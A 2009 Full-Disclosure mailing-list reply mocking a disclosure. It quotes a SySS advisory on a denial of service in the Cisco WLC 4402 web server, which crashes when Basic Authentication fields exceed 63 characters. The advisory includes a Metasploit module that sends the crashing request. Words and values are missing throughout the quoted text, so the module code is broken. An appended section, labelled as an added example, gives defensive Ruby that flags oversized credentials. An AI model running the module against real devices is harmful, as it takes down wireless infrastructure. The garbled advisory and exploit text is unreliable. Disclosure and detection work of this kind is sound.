
Re: [Full-disclosure] Cisco WLC 4402 Denial-of-Service vulnerability

that was a crappy disclosure. 

where is the .exe file with the gui?

at least make it in visual basic so i can have an interface

just send it to me in a zip

then it'll be useful to the intelligence community

n3td3v / antisec

On Sun, 26 Jul 2009 09:17:52 -0500 SySS security advisories -- 
Christoph Bott <advisories@xxxxxxxxxxxx> wrote:
>Vulnerable Product: Cisco WLC 4402 (most likely among many others)
>Vulnerability discovered: January 2009
>Reported to vendor: Jan 01, 2009
>Fix available: not yet
>+ 01/11/2009: discovered vulnerability on a customer's site
>+ 01/13/2009: initial vendor contact via psirt@xxxxxxxxx
>+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631
>+ 02/09/2009: vendor states, that bugfix is _not_ contained within
>+ 03/30/2009: vendor states: "We have a fix  for this issue. 
>due to some other issues we are investigating we may not make this
>public until about 42 days."
>+ 06/02/2009: vendor states: "I really apologize for the delay on
>publishing this advisory. The reason that we have not publish is 
>we are also incorporating other security fixes within all the 
>releases. We WILL be publishing the advisory on July 8th, 2009 at 
>1600 UTC."
>+ 07/24/2009: Customer agreed with full disclosure
>+ 07/26/2009: Still no fixes available; full disclosure due to 
>vendor activities.
>The Cisco WLC 4402 is a Wireless LAN Controller, which is 
>manageable via
>an integrated embedded webserver (emweb httpd).
>The vulnerability described below could have been verified on WLC 
>software release However, since the vulnerability 
>affects the
>integrated embedded emweb http daemon, several other products 
>software releases might be affected, too.
>Using long, random authentication data, the embedded web server 
>can be
>crashed, which leads to a device reboot. Subsequently repeated 
>lead to a permanent denial of service of the WLC (and therefore of 
>whole wireless infrastructure).
>Not needed.
>One only has to call
>and provide Basic Authentication data which uses
>a username and password longer than 63 characters each.
>The following header worked for me:
>Authorization: Basic
>The following code snippet can be used as a module within the 
>---- snip -----
>require 'msf/core'
>class Metasploit3 < Msf::Auxiliary
>        include Msf::Exploit::Remote::Tcp
>        include Msf::Auxiliary::Dos
>        def initialize(info = {})
>                super(update_info(info,
>                        'Name'           => 'Cisco WLC 4200 Basic 
>Denial of Service',
>                        'Description'    => %q{
>                                This module triggers a Denial of 
>condition in the Cisco WLC 4200
>                                HTTP server. By sending a GET 
>with long authentication data, the
>                                device becomes unresponsive and 
>Firmware is reportedly vulnerable.
>                        },
>                        'Author'                => [ 'Christoph 
><msf[at]bott.syss.de>' ],
>                        'License'        => MSF_LICENSE,
>                        'Version'        => '$Revision: 5949 $',
>                        'References'     =>
>                                [
>                                        [ 'BID', '???'],
>                                        [ 'CVE', '???'],
>                                        [ 'URL',
>                                ],
>                        'DisclosureDate' => 'January 26 2009'))
>                register_options(
>                        [
>                                Opt::RPORT(80),
>                        ], self.class)
>        end
>        def run
>                connect
>                print_status("Sending HTTP DoS packet")
>                sploit =
>                        "GET /screens/frameset.html HTTP/1.0\r\n" 
>                        "Authorization: Basic
>                sock.put(sploit + "\r\n")
>                disconnect
>        end
>---- snip ----
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
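
A defensive check for the condition the quoted advisory describes (Basic Authentication username or password longer than 63 characters), as an added example that is not part of the original post or the advisory: it classifies the Authorization header of raw HTTP requests so a filtering proxy or log review in front of the management interface can reject or flag them. The function names and sample requests are constructed for illustration, and flagging when either field exceeds the limit is a conservative assumption.

```ruby
# Added example: flag over-long HTTP Basic credentials (defensive screening).
MAX_FIELD = 63 # per-field length named in the advisory

# Classify one Authorization header value.
# Returns :absent, :not_basic, :malformed, :oversized or :ok.
def classify_basic_auth(value, limit = MAX_FIELD)
  return :absent if value.nil?
  scheme, token = value.strip.split(/\s+/, 2)
  return :not_basic unless scheme&.casecmp?('basic')
  return :malformed if token.nil?
  begin
    decoded = token.unpack1('m0') # strict base64, raises on invalid input
  rescue ArgumentError
    return :malformed
  end
  user, pass = decoded.split(':', 2)
  return :malformed if pass.nil? # no "user:password" separator
  # Assumption: flag when either field exceeds the limit (conservative).
  user.bytesize > limit || pass.bytesize > limit ? :oversized : :ok
end

# Extract the Authorization header value from a raw HTTP request head.
def authorization_header(raw_request)
  head = raw_request.split(/\r?\n\r?\n/, 2).first.to_s
  head.each_line.drop(1).each do |line|
    name, value = line.chomp.split(':', 2)
    return value.strip if value && name.strip.casecmp?('authorization')
  end
  nil
end

def screen(raw_request)
  classify_basic_auth(authorization_header(raw_request))
end

def b64(text)
  [text].pack('m0')
end

# Constructed sample requests (hypothetical, generic path and host).
SAMPLES = {
  normal: "GET / HTTP/1.0\r\nAuthorization: Basic #{b64('admin:secret')}\r\n\r\n",
  at_limit: "GET / HTTP/1.0\r\nAuthorization: Basic #{b64("#{'a' * 63}:#{'b' * 63}")}\r\n\r\n",
  oversized: "GET / HTTP/1.0\r\nAuthorization: Basic #{b64("#{'a' * 64}:pw")}\r\n\r\n",
  garbage: "GET / HTTP/1.0\r\nAuthorization: Basic !!!\r\n\r\n",
  no_auth: "GET / HTTP/1.0\r\nHost: example.invalid\r\n\r\n"
}.freeze

SAMPLES.each { |name, req| puts "#{name}: #{screen(req)}" }
```

Requests classified `:oversized` or `:malformed` are the ones to drop or alert on before they reach the controller's web interface.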
